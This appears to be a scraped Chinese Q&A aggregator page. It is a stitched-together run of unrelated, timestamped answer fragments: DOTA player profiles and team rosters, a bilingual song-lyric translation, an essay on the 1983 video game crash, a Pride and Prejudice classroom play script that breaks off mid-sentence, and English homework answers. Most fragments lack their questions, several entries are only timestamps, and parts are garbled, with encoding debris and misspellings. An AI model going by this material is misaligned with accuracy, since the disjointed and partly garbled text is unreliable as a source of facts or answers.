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2023-06-24 19:44:40

是Ehome 的B大神BurNing吧?





战队:kscn ch EHOME










喜欢的演员:Wentworth Earl Miller


想要照片的话 去百度图片搜索就有啦~ 望采纳``



Loda据说已经转HON了 唉...
2023-06-24 13:23:097

dota月之女祭司的操作技巧 以及DOTA中如SHIFT键等的技巧

2023-06-24 13:23:258


2023-06-24 13:23:408


2023-06-24 13:23:585


1、第一集——vigoss2、第二集——loda3、第三集——kuroky4、第四集——merlini5、第五集——Ars-art、vigoss6、第六集——light of heaven7、第七集——YamateH8、第八集——Sony9、第九集——Slahser10、第十集——820扩展资料1、vigossDOTA第一人,vigoss的Gank能力无人能及。就算其开局不佳,中后期也能在杀人数高踞榜首。在比赛中带领队伍摧毁对手。被誉为“DOTA统治者”。2007 ASUS锦标赛夏季冠军2007 ASUS锦标赛冬季冠军MYM#6冠军MYM#7冠军MYM国家杯冠军2007 ASUS锦标赛春季亚军MYM#5季军2008ASUS锦标赛冬季冠军(代表RUSH3D)2、lodaMYM国家杯2007第三名,2008第四名,2013年西雅图dota2国际邀请赛(TI3)第一名,loda对dota的理解体现在每个英雄身上,鱼人、隐刺等能上cw离不开loda的开发。在2013年的G1联赛中,loda组建的Alliance战队以7连胜打败所有战队拿到了G1联赛的冠军,在第三届DOTA2国际邀请即TI3赛事中,以仅失三场的战绩夺得TI3的冠军。
2023-06-24 13:24:151


EHOME:820 357 daidai burning(车神) kingJCH:longdd pis(曾经的国内路人第一大神) dgc NEO YaphetSLGD:2009 YYF ZSMJ(蛛丝马迹 转行的) GX CHNV.CN:ZHOU XIAMI(虾米 比较喜欢的选手) insense banana1 Maelk(队长) 2MaNia 3 slahser(很喜欢 蛮虎的) 4 LevenT 5 H4nn1 6 John "ezy" Chow 7 Merlini(摸神啊 膜拜) 8 FearDarkness(腿的基本不能看) kingsurf: Angel3 (Sakura),Owning (Chuan 也是最近比较火的选手了 技术不错 也满凶的)Mr. Tiang (Kingsurf赞助商),Ken (Kingsurf经理人),21July (xiaogui),MateH (Yamateh) 其实看视频 就看 当年的VP MYM 后一段的KS 现在的LGD 或者直接找有名人的比赛 推荐VIGOSSASR-ART KurokyLodaMerliniPGG等人推荐解说 加菲盐 对dota理解相当深 虽然技术很差。。。。。 复制楼上诸位加上自己的一点点东西 采纳就好 分给其他几位吧
2023-06-24 13:24:311


2023-06-24 13:24:413


2023-06-24 13:24:5911


2023-06-24 13:25:278


2023-06-24 13:26:1811

求DOTA MYM各个年代的队员名单

DOTA更注重竞技,3C注重娱乐。 和三C也差不多,都是RPG。但是他靠得的团队的配合(teamwork)。里面可以选的英雄就有90个。6.53版的HERO有91个,
2023-06-24 13:26:533


2023-06-24 13:27:002


姓名:徐志雷 小名:冰冰 年龄:21 居住地:成都ID:BurNIng 战队:7L kscn ch EHOME DK 最喜欢的英雄:QOP,SF,POM,变体精灵 最欣赏的战队:ksint 最喜欢的选手:slahser,tofu,longdd 常用插件:warkey 最喜欢的食物:肉 喜欢的饮料:红茶 喜欢的书籍:三国演义 喜欢的电影:蝙蝠侠 喜欢的乐队:林肯公园喜欢的演员:Wentworth Earl Miller 最喜欢的DOTA女选手:小八MM
2023-06-24 13:27:071


2023-06-24 13:27:257


2023-06-24 13:27:482

谁能介绍一下dota的战术发展的历史进来看看吧 说的很详细
2023-06-24 13:28:124

dota Buring为什么冠名敌法?有没有什么他用敌法的经典战役?

2023-06-24 13:28:322


ID:BurNIng战队:7L kscn ch EHOME DK BG iG VG最喜欢的英雄:POM,小娜迦,电魂,小鱼人,敌法师,炼金术师最欣赏的战队:ksint,vg最喜欢的选手:slahser,820,tofu,longdd喜欢的书籍:三国演义,倚天屠龙记喜欢的电影:蝙蝠侠喜欢的乐队:林肯公园喜欢的演员:Wentworth Earl Miller
2023-06-24 13:28:461


MYM是个战队的名字你记错了是在GG平台上打的 夺冠了当时这是他们DOTA的队员MYM]Maelk(队长)MYM]FearMYM]MaNia-MYM]slahserMYM]H4nn1MYM]MerLiNiMYM]Pusher
2023-06-24 13:29:011

dota,pom的出装路线如题 谢谢了

2023-06-24 13:29:191


汽车又是什么品种 查看更多答案>>
2023-06-24 13:29:261


homemade 自制的 双语对照 词典结果: homemade[英]["hu0259u028am"meu026ad][美][u02c8homu02c8med] adj.(衣服、食品等)自家制的; 很高兴为您解答 如果你对这个答案有什么疑问,请追问
2023-06-24 13:27:201


With You - Arden ChoI wanna hear you say you love me我想听你说你爱我that you just can"t live without me你的生活不能没有我even if you have to lie即使你不得不撒谎I just wanna hear you say我也想想听你说I wanna be the one you dream of我想走进你的梦里the one who knows all your secrets成为那个知道你所有秘密的人the one you can"t live without成为你离不开的那个人even if hurts to stay即使它会受伤害So be the one我也愿意to hold me down接受我吧Take me out and face the world带我出去,面对这个世界Side by side握着我的手say you"ll be你是you"ll be mine, you"ll be mine你是我的 你是我的one day one day总有一天 总有一天When we laugh and hear you calling my name当我们笑的时候,听到你叫我的名字Cause you don"t konw what it"s like going inside因为你不知道是什么滋味Could be possiblely be with you有可能和你在一起吗I wanna feel the touch of your lips我想触摸你的嘴唇the closeness of your body你的身体Would you wanna be my first kiss你想成为我的初吻吗I wanna be you last and only我想要你成为最后一个,也是唯一一个Your the one I wanna grow old with我想与你一起慢慢变老Share a life and build a family一起生活,组建家庭Don"t you wanna be the one你不想吗that"ll write this happy ending我们会有一个很美满的结局So be the one做我的唯一吧to hold me down接受我吧Take me out and face the world带我出去,面对这个世界Side by side握着我的手say you"ll be说你是you"ll be mine, you"ll be mine你是我的 你是我的One day one day总有一天 总有一天When we laugh and hear you calling my name当我们笑的时候,听到你叫我的名字Cause you don"t konw what it"s like going inside因为你不知道是什么滋味Could be possiblely be with you有可能和你在一起吗Take my hands握着我的手lead me to the place we can go all round带我去周边的地方Make me smile让我微笑Wrap me in the world for you love把我埋进你给的爱情中So that这样One day one day总有一天 总有一天I can hear you calling my name我能听到你叫我的名字Cause you don"t know what it"s like going inside因为你不知道是什么滋味Could be possiblely be with you有可能和你在一起吗Be with you和你在一起
2023-06-24 13:27:221


u200b “曾经有一阵子,很多电子 游戏 都让我很喜欢,比如《吃豆人》。现在,这些 游戏 真的很无聊。它们看起来都一模一样。在 游戏 里,你只顾着杀掉外来入侵者,然后就完了。真无聊!” ——Chris Foudy, 美国新泽西州的一个12岁男孩;引自1983年10月17日《纽约时报》报道 1970年代,从 娱乐 场走向千家万户的电子 游戏 1962年,麻省理工学院的一群学生在实验室的DEC小型机上,完成了人类 历史 上第一个有记录的电子 游戏 :Spacewar;这款 游戏 允许两位玩家操纵宇宙飞船互相射击。当时,计算机的使用几乎仅限于学术和复杂商业用途,人们头一次发现它居然还能用来 娱乐 。很快,Spacewar在美国学术圈子里变得非常流行,甚至有人专门开发了手柄等外接设备。 问题在于:1960-70年代的计算机还非常昂贵,“家用电脑”市场尚未诞生。有没有一种方法,能够让广大消费者玩到电子 游戏 ? 某些聪明的研发人员想到:如果可以定制一台“专用 游戏 机”,进行收费运营,就可能创造可持续的商业模式。 1971年,第一批“街机”在美国诞生了:它们运行着类似Spacewar的 游戏 ,可供2-4人游玩,一般置于酒吧、购物中心等大型 娱乐 场所。这些街机吸引了一定的销量和注意力,但是还谈不上流行。 看到家用 游戏 主机市场的巨大潜力,街机霸主雅达利当然不甘落后,与零售业巨头Sears联手于1975年推出了Home Pong,也就是Pong的家用版本;这款主机不算成功,却使得雅达利积累了家用市场的宝贵经验。此后,玩具巨头Coleco也闯入市场,推出了Telstar家用主机。 在这个时期,绝大部分的 游戏 主机都是“绑定型”:软硬件不分,每台主机都会内嵌几个 游戏 ,玩家也只能玩这些 游戏 。 鉴于大部分 游戏 的玩法都很简单、很相似,玩家也不需要额外买什么 游戏 ,“ 游戏 软件市场”尚未诞生。 1970年代末,电子 游戏 作为一种大众 娱乐 形式已经被广泛接受,在美国、欧洲、日本都成为了新兴产业。日后大名鼎鼎的雅达利、任天堂、世嘉等 游戏 巨头,至此都已经加入战局。但是,在主流消费者心目中,“电子 游戏 ”和“玩具”的区别还不是特别明显,许多家用 游戏 主机甚至是与玩具搭配出售的。在计算机技术突飞猛进的时代, 游戏 行业也需要突飞猛进。 1968-1976年,被称为电子 游戏 产业的“第一世代”。在这个时期,电子 游戏 从无到有、从实验室走向 娱乐 场所,又走向了千家万户的客厅。但是,由于技术局限,电子 游戏 尚未从玩具当中独立出来,市场规模还不大。 很快,雅达利公司将以“第二世代”解决上述问题,取得巨大的成功,然后带来巨大的灾难。 从“烈火烹油、鲜花着锦”,到“白茫茫大地真干净” 1976年11月,仙童半导体发布了一款划时代的 游戏 主机——Channel F. 这款主机搭载了独立的CPU,运算能力远远强于此前的一切竞品;使用可拆卸的卡带存储器,可以随时更换 游戏 软件。 这些划时代的变革,意味着 游戏 主机彻底脱离了“玩具”的范畴,反而与计算机更加接近了。 至此,全球电子 游戏 行业进入了“第二世代”。 仙童Channel F并没有取得商业成功,但是它启发了街机巨头雅达利,后者于1977年9月推出了著名的Atari 2600主机。这台主机的基础架构与当时的家用电脑类似,采用独立CPU和卡带存储,还有标准化的摇杆控制器。在强大的运算能力支持下,Atari 2600可以运行彩色 游戏 ,图形表现效果也大幅提升,从而为更复杂的 游戏 玩法打开了大门。 1982年,问题出在内容端。大批开发商涌进了电子 游戏 行业, 它们笃信:市场足够大,用户足够蠢,即使开发出来的产品是垃圾,用户也会买下来! 当时,家用 游戏 软件市场处于无序状态,谁都可以开发软件,谁都可以在渠道进行铺货。当时的媒体还不发达,用户很难根据口碑挑选产品; 游戏 开发技术和创意也都很不成熟,产品陷入同质化。1982年6月,雅达利主机平台总共拥有100款 游戏 ;当年12月,这个数字飙升到了400款。 雅达利对 游戏 发行毫无掌控,也没有兴趣去掌控。1983年初,美国至少有100家主机 游戏 开发商,甚至把竞争对手的产品换个名字就能上市圈钱。这种情况当然不正常,但是所有人都认为:离洗牌的那天还很远。1982年,雅达利CEO表示:总有一天,半数的美国家庭都会拥有 游戏 主机,届时 游戏 行业的泡沫才会破裂。直到今天,这个目标还没达到! 最终引发市场崩溃的,是1982年12月发布的《E.T.》。 这是一款由雅达利开发、由同名电影改编的冒险 游戏 。《纽约时报》预测,既然电影很成功, 游戏 肯定也会成功——这大概是最早的“影游联动”。《E.T.》 游戏 是当年美国青少年最盼望的圣诞礼物,售出了150万份。可是,当用户真的玩到这款 游戏 时,就被它的粗陈滥造给惊呆了。当时的媒体评论包括:“枯燥无味”;“图像质量很差”;“不可能有人玩通关”;“应该申请退款”…… 游戏 厂商总是低估了用户的智商,以为他们能接受任何劣作。但是, 用户的耐心有一个临界点,一旦突破了底线,他们就会冷酷的撤回所有支持。 1983年初,美国的零售渠道发现:原本人满为患的 游戏 货架,竟然无人问津了!作为罪魁祸首的《E.T.》,有大约300万份卡带被渠道退回。原价35美元的 游戏 卡带,现在被迫打折至5美元。平心而论,这不仅仅是《E.T.》的错,与它同期上市的《吃豆人》(注:不是后来红白机上的同名 游戏 )被多家媒体评为“ 历史 上最差的 游戏 ”。现在,电子 游戏 成为了“质次价高”的代名词,玩 游戏 简直愚不可及! 到了1985年,美国主机 游戏 行业实际上已经消亡, 游戏 软件市场规模只剩下1亿美元, 数十家 游戏 开发商垮掉了。绝大部分零售渠道决定永久性撤销电子 游戏 柜台。就连街机 游戏 都受到了影响——美国有15%的街机厅关闭了,幸存的街机厅平均收入下滑了40%。作为罪魁祸首的雅达利,被母公司华纳通信拆分出售,从此不再是一家重要的 游戏 公司。 当美国 游戏 产业为“雅达利崩溃”震惊时,在大洋彼岸的日本,任天堂正在春风得意。1980年,任天堂发布了Game & Watch,这是世界上最早的便携式 游戏 机(掌机)之一。虽然运算能力孱弱、只能显示狭小的黑白画面,但是在优秀的工业设计和高质量的 游戏 内容支持下,这款产品在漫长的生命周期里取得了4340万的总销量,成为了任天堂第一款成功的 游戏 硬件产品。 谁也不曾预料到,任天堂即将开始对全球 游戏 行业长达十余年的统治, 而且此后再也无人能复制这种统治。 电子 游戏 行业的第二世代结束于“雅达利崩溃”之时。这个世代的赢家是雅达利,它的Atari 2600/5200系列主机卖出了3000多万台;但是它很快就跌落神坛、一去不复还。Magnavox(飞利浦)、Mattel、Coleco瓜分了剩下的蛋糕,但是同样在“雅达利崩溃”之中元气大伤。与此同时,任天堂在掌机领域建立了不可动摇的优势;世嘉则在街机行业一边赚钱一边静待时机。下一个世代,注定将属于这些日本公司。 “雅达利崩溃”的 历史 教训:还会再次发生吗? “雅达利崩溃”留给 游戏 行业最大的 历史 教训是: 内容,唯有内容,才是消费者最终关心的东西。 没有高质量的内容, 游戏 市场的发展就变成了无源之水、无本之木。雅达利对 游戏 行业的统治从Space Invader这样的“杀手级内容”开始,到E.T.这样的“惨剧级内容”告终。此后,高质量的内容生态系统成为了一切 游戏 主机平台成功的关键。 雅达利为什么失去了对内容的控制?首先是它缺乏对第三方内容的影响力;换句话说,它没有控制发行环节,导致大量“垃圾内容”涌进市场并耗尽了消费者的耐心。其次是它放松了自主研发能力,所以不具备足够优秀的第一方内容。1981年,雅达利平台上75%的 游戏 软件销售额来自雅达利的第一方 游戏 ;1982年,这个比例降低到了40%。当竞争对手疯狂挖走雅达利研发人员时,它没有及时作出回应。 从1972年Pong上市,到1982年“雅达利崩溃”,电子 游戏 行业只走过了十年的发展历程。这个稚嫩的行业还没有足够的经验去面对错综复杂的消费者需求。与此同时,个人电脑市场正在崛起——1977年苹果II型电脑上是,1982年IBM PC上市,它们都具备一定的 游戏 功能。在主机 游戏 市场崩溃之后,大量人才和资本涌向了计算机软件行业。但是,由于个人电脑价格昂贵,它们注定不可能彻底填补 游戏 主机留下的空白地。 1982年,即“雅达利崩溃”发生前夕,全球电子 游戏 市场(包括软件和专业硬件)的规模一度达到420亿美元。到了1985年,这个数字下降到了140亿美元,而且大部分都来自街机市场。如果不是任天堂和世嘉以日本为大本营另辟蹊径, 游戏 行业可能会陷入多年的沉沦。 “雅达利崩溃”让电子 游戏 行业的发展 中心 从美国转移到了日本,后者在硬件研发、内容研发和市场等方面均具备绝对优势。 美国再次夺回全球 游戏 行业中心的地位,要等到21世纪初微软加入战局之后,那时美国已经在信息技术领域全面领先;但是,美国 游戏 市场“一家独大”的格局再也没有重现。 那么,任天堂、世嘉等日本厂商,是怎么解决导致“雅达利崩溃”的问题的呢?在这里,让我们援引两家厂商管理层的原话吧。 “雅达利崩溃了,因为他们给予了第三方开发商太多的自由,导致市场被垃圾 游戏 填满了!” ——山内溥,任天堂社长,1986年 “我们会吸引许多19-27岁玩家的兴趣,他们曾经是雅达利 游戏 的粉丝,但是后来对整个系统厌倦了。” ——Bruce Lowry, 世嘉美国总裁,1986年 至于他们是怎么执行上述策略的,那就是另一个故事了。
2023-06-24 13:27:271


A handmade pizza
2023-06-24 13:27:304

英语 急求

danger possiblely fall was reportting
2023-06-24 13:27:317

Homemade Wine 歌词

歌曲名:Homemade Wine歌手:The Ozark Mountain Daredevils专辑:20Th Century Masters:The Millennium Collection: Best Of The Ozark Mountain DaredevilsHomemade WineShawn Mullins歌词整理:像风一样Sixty miles from El PasoFeelin" lonesome as can beDriving further from the heartacheThat was slowly killing meI left at 4 AM last MondayFilled my tank at Luther"s storeI might be checkin" in come Sunday"Cause I know by then she"ll walk the floorShe has it still inside her skullThat I am hers and she is mineShe"s dead on empty and I am fullOf broken dreams and homemade wineThere"s a kid who plays the squeezeboxOn the border bridge on the Juarez sideHe dances to the beatWith no shoes on his feetTo the music that he makes as I drive byAnd I felt just like the devil the whole night"s pullBut right this second I feel fineMy tank is dead on empty, but I am fullOf broken dreams and homemade wineNow the gulf wind she sings to me a love songI can hear her from the boxcar that I rideHer voice is in my brainMaking music with this trainThat will soon take me to the other sideAnd she might think that I"m coming backTo hold her close and stop her cryin"But this freight train"sTraveling down a southbound trackFull of broken dreams and homemade wineJust broken dreams and homemade wineBroken dreams and homemade wine------the end------
2023-06-24 13:27:361


  Pride and Prejudice  the main characters  Mr.Bennet Mrs.Bennet Jane Bennet Elizabeth Bennet  Mary Bennet Kitty Bennet Lydia Bennet Miss Lucas  cousin Mr.Collin  Mr.Bingley,Mrs.Bingley  Mr.Darcy,Mrs.Darcy  Act One  Scene:Mr. Bennet"s home, Time :In the afternoon  The main characters:the whole families of Mr.Bennet  (Mr.Bennet sits in the desk,reading books)Mrs.Bennet comes to the stage quite in a hurry)  Mrs Bennet:”My dear Mr.Bennet,have you heard that Netherfield Park is let at last?”Mr.Bennet made no answer(go on reading his book),(cried impatiently)Do not you want to know who has taken it?”  (Lydia and Kitty go to the stage,acting that they hide at the door,whipering loudly)  Mr.Bennet:”you want to tell me,and I have no objection to hearing it.”(  Mrs .Bennet(quite excited):” A Mr.Bingley arriving from the north,five thousand a year, and the most important is that he is single,you must indeed go and see him,only think what an establishmenr it would be for one of our girls”  Mr.Bennet:”How can it affect them?”(stand up and walk away,still not looking at Mrs.Bennet)  (Elizabeth goes to the stage,patting Kitty,whispering “what have I told you about listening at the door”,Kitty:”sh….sh….”)  Mrs.Bennet:”oh,single,my dear,to be sure!A single man of large fortune……You must know that I am thinking of marrying one of my girls…….”  Mr.Bennet:(not waiting Mrs.Bennet to finish her speech) I see no occasion for that(opening the door and surprised to find the three girls)Good heavens!people”  Mrs.Bennet:”For we may not visit if you do not,as you well know,Mr.Bennet!”  the gils start to brawl to Mr.Bennet:”are you listening,dad?”  “you never listen”  “you must,papa,at once”  Mr.Bennet:(seeming to have no choice)There is no need,I already have。  Mrs.Bennet seems so surprised:”you already have?when?”  The ladies cheers happily:” is he amiable?”  “is he handsome?”  “so will he come to the ball tomorrow,dad?”  Mr.Bennet:I believe so.(With the cheers of the girls),the sound start to lower and finally die away.父母加五个女儿,正好七个人。如果还需要的话,还有后面几幕,因为我们班排练一个话剧就用的这个。可能有一些有语法错误,不过还好比较少吧  Act Two  Time :in the evening  Scene:at the ball  The main characters: :the whole families of Mr.Bennet, Mr.Bingley ,Miss.Bingley,Mr.Darcy,Miss Lucas,some people of the ball)  Then the sound of dance music comes out and become louder and louder,the people of the ball(include Lydia and Kitty) are dancing,Elizabeth,Jane,Lucas,Marry stand aside)  Elizabeth:”if every man does not end the evening in love with you,then I am no judge of beauty”  Jane:(岳阳)“or Man”(they start to talk and laugh)  The sound of dance music disappeared suddenly,all the people pay their attention to the door(Mr.Bingley is on the right,Mr.Darcy is in the middle,Miss.Bingley is on the left, coming to the stage)  Miss Lucas whisper to Elizabeth :(秋霞)”Mr.Darcy,ten thousand a year,and he owns half of Derbyshire……”(the three go forward and come to Elizabeth,and Darcy gives a short but strange glance to Elizabeth)  The sound of music goes on.Mr.Bennet and Mrs Bennet come to the stage .  Mrs.Bennet:”(木子)Mr.Bennet,you must introduce him to the girls immediately”(after saying her words,she takes the hand of the girls , Elizabeth,Jane,Lucas,Marry,coming to Mr.Bingley)  Mr.Bennet:(小鸡)this is my eldest daughter,Jane,and Elizabeth,Marry,Miss Lucas.  Mr.Bingley:I am delighted to make your acquaintance.  Mr.Bennet:and this is Mr.Darcy of Pemberly in Derbyshire.(the ladies salute)  Mr.Bingley:may I have the honor to dance with you?Miss Bennet(to Jane)  Jane smiled:(岳阳)It is my pleasure.  Mr.Bingley Jane,Mr.Bennet and Mrs.Bennet ,Marry ,Lucas,are off-stage.  Elizabeth:” do you dance,Mr.Darcy?”  Mr.Darcy:not if I can help it.  Elizabeth feels quite boring and leaves Darcy, Lucas (秋霞)goes on to the stage and talk to Elizabeth in one corner.and soon they listen the conversation between Mr.Darcy and Mr.Bingley.  Mr.Bingley:”Jane is the most beautiful creature I"ve ever beheld,but her sister Elizabeth is agreeable”  Mr.Darcy;perfectly tolerable.not handsome enough to tempt me,return to your partner and enjoy her smile.(their voice becomes lower)  Elizabeth:(a little embarrassed but smile at Lucas)I would not dance with him for all of Derbyshire)  They both laugh and the sound lowers.  Act Three  Time:in the morning  Scene:the Netherfield Park  The main characters:Elizabeth,Mr.Bingley ,Miss.Bingley,Mr.Darcy,one servant of the Netherfield Park)  (Jane is invited to the Netherfield to dine with Mr.Bingley,but because of some accident,she is sick .And when Elizabeth receive the imformation,she goes to the Netherfield Park.)  Miss.Bingley talks to Mr.Darcy,Mr.Darcy is reading a book.  A servant come:”Miss Elizabeth Bennet.”  Elizabeth goes on the stage.  Miss.Bingley:”good lord,did you walk here?”  Elizabeth:I did.  (there is a few seconds" silence,Mr.Darcy stands up and salute to Elizabeth.)  Elizabeth : I am sorry,how is my sister?  Mr.Darcy:(answering immediately)she is upstairs.  Elizabeth:thank you and turn back.(off-stage)  Miss.Bingley:”my goodness,did you see her hem,six inches deep in mud.”  Mr.Darcy keeps silent and look at the direction where Elizabeth leaves.and then go to the table to write.  (Outside the drawing room,Mr.Bingley and Elizabeth are talking .  Mr.Bingley:”It is a pleasure that Jane is ill…"s not a pleasure that she is ill,of course not,it"s a pleasure that she is here,being ill.  They are to on-stage.and Elizabeth sit into the desk ,holding a book to read)  Miss.Bingley:”you write uncommonly fast,pray tell your sister I long to see her.”  Mr.Darcy:”I have already told her so once,by your desire”  Miss.Bingley;“how can you contrive to write so even?”  Darcy was silent. Mr.Bingley and Elizabeth are on-stage.  Mr.Bingley :You young ladies are so accomplished.  Darcy;the word is applied too liberally.I do not know more than half a dozen.  Elizabeth:you must comprehend a great deal in the idea.  Darcy:I do.(looking Elizabeth)  Miss.Bingley:“she must have a knoeledge of music,singing,drawing,dancing and modern languages to deserve the word.”  Darcy:”and she must improve her mind by extensive reading,”(looking at Elizabeth again.  Elizabeth :(closes the book immediately.)I am no longer surprised at your knowing only six accomplished women,I never so such woman,she would certainly be a fearsome thing to behold.(a little angery)  Darcy look at Elizabeth,silently.  Bingley smiles to break to silence.  Act Four  Time :between the morning and the noon  Scene:the street and the ball  The main characters:Elizabeth,Darcy,Wickham,Bingley,Lucas,Collins,Lydia,Kitty  Someday Elizabeth,Lydia,Kitty are wandering in the street.By chance,Elizabeth loses her handkerchief,and Wickham picked it up.  Wickham :佳佳”yours,I believe.”  Lydia :小樊how perfect you are.  Kitty:王芳did you drop it on purpose  Lydia;小樊Mr,Wickham is a lientenant.  they are walking.  Darcy and Bingley are on-stage.They corroborated it with a bow.but when Darcy looks Wickham,he turns back and goes away.  All people are off-stage except Elizabeth and Wickham.  Wickham :”(佳佳)how long has Mr.Darcy been a guest there?”  Elizabeth:“about a month”(a little silence)”forgive me,but are you acquainted with him,Mr.Darcy?”  Wickham:”佳佳my father managed his estate,and his father treated me like a son,and his father bequeathed me the rectory in his estate.but Darcy ignored his wishes”  Elizabeth:(quite confused):why?  Wickham:”佳佳jealousy,his father loved me better and Darcy could not stand I am a poor foot-soldier.”  Elizabeth:”how cruel”(angry and confused)  They both have a forced smile.  (Mr.Bingley holds a ball,and the Bennet are invited)  The sound of dance music start.almost all the Bennet girls are there,and the cossin,Collins,who has a passion for Elizabeth,Lucas)  Mrs .Bennet,the girls come to Mr.Bingley.  Mrs.Bennet:(木子”may I say what an immense pleasure it is to see you again,Mr.Bingley.”  Mr.Bingley:Mrs,Bennet  Mrs Bennet is off-stage.(木子  Mr.Bingley:(To Jane) I am so pleased you are here.  Jane;(岳阳)(smiling)so am I.  Elizabeth seems to find someone.  Mr.Bingley:”and how are you?are you looking for someone?”  Elizabeth:(tumble to relize what he says)no,not at all, I just admire the general splendour.  Elizabeth comes to Lucas.the rest are off-stage.  Lucas;(秋霞)”Mr.Wickham is not here.he has been detained for some thing.  Elizabeth shows a forced smile:maybe something about Mr.Darcy  Lucas:(秋霞(confused):how come?  Then Collins comes out .  Collins;”perhaps you will do me the honor,Miss Elizabeth”  Elizabeth:oh,Mr.Collins……of course.  (it is quite funny because of Collins" clumsy dance steps)  Elizabeth and Lucas both laugh .(秋霞  Darcy is on-stage.  Darcy:may I have the next dance?Miss Elizabeth?”  Elizabeth;(in a shock)may  The sound of the music starts.  Darcy:”tell me,do you and your sisters very often walk to Meryton?”  Elizabeth:”yes,we often walk there”(not understanding why he asks such question)”it"s a great opportunity to know new people,when you meet us,we just meet a new friend,Mr.Wickham”(looking at Darcy)  Darcy:”Mr.Wickham is blessed with such happy manners,he is sure of making friends,whether he is capable of retaining them is less so”  Elizabeth:”I hear such different accounts of you as puzzle me exceedingly”  Darcy:I hope to afford you more clarity in the future.”  They just look into each other"s eyes.  Act Five  Time:in the afternoon and in the evening  Scene :Rosings and the house of Collins  The main characters:Elizabeth,Lucas,Darcy,Collins,Lady Catherine,Miss de Bourgh  Soon,Lucas married Collins,Jane is given a letter by Miss Bingley for their leave to London. Elizabeth comes to visit the new house of Lucas and Collins.  Collins and Lucas are standing on the stage,waiting for someone.  Elizabeth goes to the stage.  Collins:welcome to our humble abode.  Elizabeth hugs with Lucas.(laughter)  Lucas :(秋霞(leads Elizabeth her own particular room.)”it is such a pleasure to run my own house……”  Outside screaming Collins”Charlotte,come here.”  Lucas:秋霞(hurriedly)”has that pig escaped again…..oh…"s lady Catherine”(run and see)  Collins:”good news,we are invited to Rosings from Lady Catherine”  Lucas:秋霞how wonderful  Soon they come to the Rosings.  Lady Catherine(海燕) and Miss de Bourgh sit in the desk.  After the Collins and Elizabeth salute to Lady Catherine.  Catherine;”海燕so you are Elizabath Bennet?”(looking at Elizabeth)  Elizabeth:”I am ,your ladyship”  Darcy goes on the stage.  Elizabeth;“Mr.Darcy!what are you doing here?”  Darcy :Miss.Elizabeth.I am a guest there.  Catherine;” (海燕) You know my nephew?”(stand up and look Elizabeth quite arrogantly)  Elizabeth:” (海燕)yes,I had the pleasure of meeting your nephew in Hertfordshire.”(Darcy just look at Elizabeth,silently)  At table  Elizabeth sits beside Darcy.  Darcy :“I trust your family is in good healthy,Miss Elizabeth”  Elizabeth:”They are ……..”  Catherine:”(海燕)do you play the pianoforte,Miss Bennet?“  Elizabeth:”a little.and very poorly”  Catherine:” (海燕)oh…..(Arrogantly)….do you draw?”  Elizabeth :no,not at all  Catherine:” (海燕) has your governess left you?”  Elizabeth;“we never had a governess”  Catherine:” (海燕) five daughters at home without a governess?that is quite strange”(look strange into Elizabeth)come on,play for us”  Elizabeth :”but I can not….""  Collins :”come ,Lizzie,her ladyship demands it”  Eizabth starts to play.and Darcy went to her,watching.  Act Six  Time :in the morning  Scene;in the church and in the mountain  The main characters:Elizabeth,Darcy, ,Colonel Fetzwilliam Collins Lucas and some other people  Collins say a prayer”there are many conveniences which others can…”  Elizabeth ,Darcy,Lucas(秋霞 and Colonel Fetzwilliam say a prayer given by Collins,however,most of the people seem to sleep.Elizabeth sits near to Colonel,Darcy"s underlying offcer.  They talk.  Elizabeth :”how long do you plan to stay”  Colonel:”小溪as long as Darcy chooses”  Elizabeth :”everyone seems like so”  Colonel:""小溪however,Darcy is a most loyal companion,he recently rescue of one of his friends,he saved him from an imprudent marridge.”  Elizabeth:(can not help it)who is that man?  Colonel:小溪his closest friend,Bingley  Elizabeth;did Mr.Darcy give a reason for this interference?(nerely cried,looking Darcy,then rushing out of the church)  It is heavily raining.Elizabeth just run,run,and run.Finally,she comes to a gloriette.She was totally wet.  Darcy comes out,totally wet,too.  Darcy ;”(painfully)Miss.Elizabeth,I came to Rosings only to see you,I have fought against jugdement,my family"s expectation ,my rank,I will put them aside and ask you to end my agnoy……”  Elizaberth;I don"t understand  Darcy:”I love you,most ardently”  There is silence.  Elizabeth “I am so appreciate the struggle you"ve went through,I am very sorry to cause you pain”  Darcy ;”are you laughing at me?”  Elizaberth:”no”  Darcy:”are you rejecting me?”  Elizaberth:”I am sure the
2023-06-24 13:27:371


B25超级空中堡垒 ,B29同温层堡垒这是瞎说(同温层堡垒是B-52),B-25是米切尔,B-29是超级空中堡垒(Super flying fortress),还有B-17空中堡垒(Flying fortress)、B-24解放者、B-26入侵者(Invader),这些是陆航的,海航的有:SBD无畏俯冲轰炸机、SB-2c地狱潜水鸟俯冲轰炸机、TBD掠夺者鱼雷轰炸机、TBF/TBM复仇者鱼雷轰炸机,我记得的就这么多了(其他的像B-32这种用的也不多)
2023-06-24 13:27:381

关于homemade. food 的英语作文

good health is more important than wealth.Food gives us energy,so we must have enough food to keep healthy.  we should eat more fruit and vegetables and less meat,and we also must have right kinds of food.A cup of milk a day can help make us healthy as well.Different foods help us in different ways,if we eat too little or too much,or if we choose the wrong food,we may become sick,so we must have meals three times every day on time,too.  It"s necessary for us to have healthy eating habits.
2023-06-24 13:27:441


2023-06-24 13:27:511


我查到的是high official,希望对您有帮助
2023-06-24 13:27:564


2023-06-24 13:28:022


2023-06-24 13:28:091


2023-06-24 13:28:161

王字旁,一个玉 念什么?怎样组词呢?

2023-06-24 13:28:243


love 2.bringing 3.possiblely 4.seasonal 5.clean 6.sank 7.collecting 8.scarfs
2023-06-24 13:27:141


